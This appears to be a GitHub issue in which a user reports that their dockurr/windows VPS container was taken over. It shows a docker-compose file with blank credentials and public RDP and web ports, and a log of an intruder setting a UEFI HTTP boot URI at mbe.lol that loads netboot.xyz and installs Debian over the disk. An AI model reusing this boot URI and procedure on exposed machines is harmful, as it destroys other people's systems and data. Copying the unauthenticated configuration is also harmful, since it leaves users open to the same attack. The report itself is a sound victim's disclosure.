OS Changes and Hack Threats #1676
Description
Operating system
Windows 11
Description
Hello everyone and the developer team, I would like to ask about the indication of hacking and the OS suddenly changing where I happened to install docker/windows on a VPS that is connected to the internet and has a Public IP, but after 2 days I left my OS suddenly changed to Debian 13, where I checked with the command docker compose logs, found a sudden install to the domain https://mbe.lol/ and others like as I attached in the docker logs,
And now my OS is changed and data is lost
Docker compose
services:
windows:
image: dockurr/windows
container_name: windows
environment:
VERSION: "11"
USERNAME: ""
PASSWORD: ""
RAM_SIZE: "14G"
CPU_CORES: "5"
DISK_SIZE: "250G"
devices:
- /dev/kvm
- /dev/net/tun
cap_add:
- NET_ADMIN
ports:
- 8006:8006
- 3389:3389/tcp
- 3389:3389/udp
volumes:
- ./windows:/storage
restart: always
stop_grace_period: 2mDocker log
h ht htt http http: http:/ http:// http://m http://mb http://mbe http://mbe. http://mbe.l http://mbe.lo http://mbe.lol http://mbe.lol: http://mbe.lol:5 http://mbe.lol:55 http://mbe.lol:55/ http://mbe.lol:55/e http://mbe.lol:55/ev http://mbe.lol:55/evr http://mbe.lol:55/evro http://mbe.lol:55/evro. http://mbe.lol:55/evro.e http://mbe.lol:55/evro.ef http://mbe.lol:55/evro.efi ┌──────────────────────────────────────────────────────────────────────────────────────────────────┐││ HTTP Boot Configuration └──────────────────────────────────────────────────────────────────────────────────────────────────┘┌──────────────────────────────────────────────────────────────────────────────────────────────────┐││││└──────────────────────────────────────────────────────────────────────────────────────────────────┘Configuration changed UEFI HTTP Input the description <IP4> Internet Protocol http://mbe.lol:55/evro.efi Boot URI F10=Save F9=Reset to Defaults Esc=Exit ↑↓=Move Highlight <Enter>=Select Entry A new Boot Option will be created according to this Boot URI. Esc=Exit ↑↓=Move Highlight <Enter>=Select Entry Device Path : PciRoot(0x0)/Pci(0x3,0x0)/MAC (02D160EA3072,0x1)/IPv4(0.0.0 .0,0x0,DHCP,0.0.0.0,0.0.0.0,0 .0.0.0)/Uri(http://mbe.lol:55 /evro.efi)
windows | >>Start HTTP Boot over IPv4....
windows | Station IP address is 172.30.0.2
windows |
windows | URI: http://mbe.lol:55/evro.efi
windows | File Size: 1137664 Bytes
Downloading...100%iPXE initialising devices...
windows | autoexec.ipxe... Not found (https://ipxe.org/2d0c618e)
windows |
windows |
windows |
windows | iPXE 1.21.1+ (g0abef) -- Open Source Network Boot Firmware -- https://ipxe.org
windows | Features: DNS HTTP HTTPS iSCSI NFS TFTP VLAN SRP AoE EFI Menu
windows | netboot.xyz - v3.x
wi
windows | Configuring (net0 02:d1:60:ea:30:72)...... ok
windows | Attempting https boot over IPv4...
windows | https://boot.netboot.xyz/menu.ipxe... ok
windows | boot.cfg... ok
windows | Attempting to retrieve latest upstream version number...
windows | https://boot.netboot.xyz/version.ipxe... ok
windows |
windows | netboot.xyz v3.x - next-server: 172.30.0.1 Default: Boot from local hdd (293) Distributions: Linux Network Installs (64-bit) Live CDs BSD Installs Windows Tools: Utilities (UEFI) Architecture: x86_64 iPXE shell Network card info About netboot.xyz Signature Checks: netboot.xyz [ enabled: true ] Boot from local hdd (293) Boot from local hdd (292) Boot from local hdd (292) Boot from local hdd Linux Network Installs (64-bit)
windows |
windows | linux.ipxe... ok
windows | http://boot.netboot.xyz/sigs/linux.ipxe.sig... ok
windows | Linux Installers - Current Arch [ x86_64 ] ... Linux Distros: AlmaLinux Alpine Linux Arch Linux BlackArch CentOS Stream Debian Devuan Fedora Fedora CoreOS Flatcar Container Linux Gentoo Harvester IPFire k3OS Kairos Kali Linux Mageia NixOS openEuler AlmaLinux AlmaLinux Alpine Linux Alpine Linux Arch Linux Arch Linux BlackArch BlackArch CentOS Stream CentOS Stream Debian
windows |
windows | debian.ipxe... ok
windows | http://boot.netboot.xyz/sigs/debian.ipxe.sig... ok
windows | Debian - amd64 Latest Releases Debian 13.0 (trixie) Debian 12.0 (bookworm) Testing Releases Debian forky (testing) Debian sid (unstable) Older Releases Set release codename... Debian 13.0 (trixie)
windows | Debian [trixie] Installer Install types Text Based Install Graphical Based Install Rescue Mode Expert Install Specify preseed url... Text Based Install Text Based Install Graphical Based Install
windows |
windows | http://deb.debian.org/debian/dists/trixie/main/installer-amd64/current/images/netboot/gtk/debian-installer/amd64/linux... ok
windows | http://deb.debian.org/debian/dists/trixie/main/installer-amd64/current/images/netboot/gtk/debian-installer/amd64/initrd.gz... ok
windows |
windows | MD5sums:
windows | 422d12c9cae29654502dbbd411c7cc5c linux
windows | 74dcf240ff72ae1e4c2b615f2ebababc initrd.gz
windows | EFI stub: Loaded initrd from LINUX_EFI_INITRD_MEDIA_GUID device path
windows | BdsDxe: loading Boot0009 "debian" from HD(1,GPT,94215454-F807-4E67-803A-EB0BA727181A,0x800,0x1E8000)/\EFI\debian\shimx64.efi
windows | BdsDxe: starting Boot0009 "debian" from HD(1,GPT,94215454-F807-4E67-803A-EB0BA727181A,0x800,0x1E8000)/\EFI\debian\shimx64.efiScreenshots (optional)
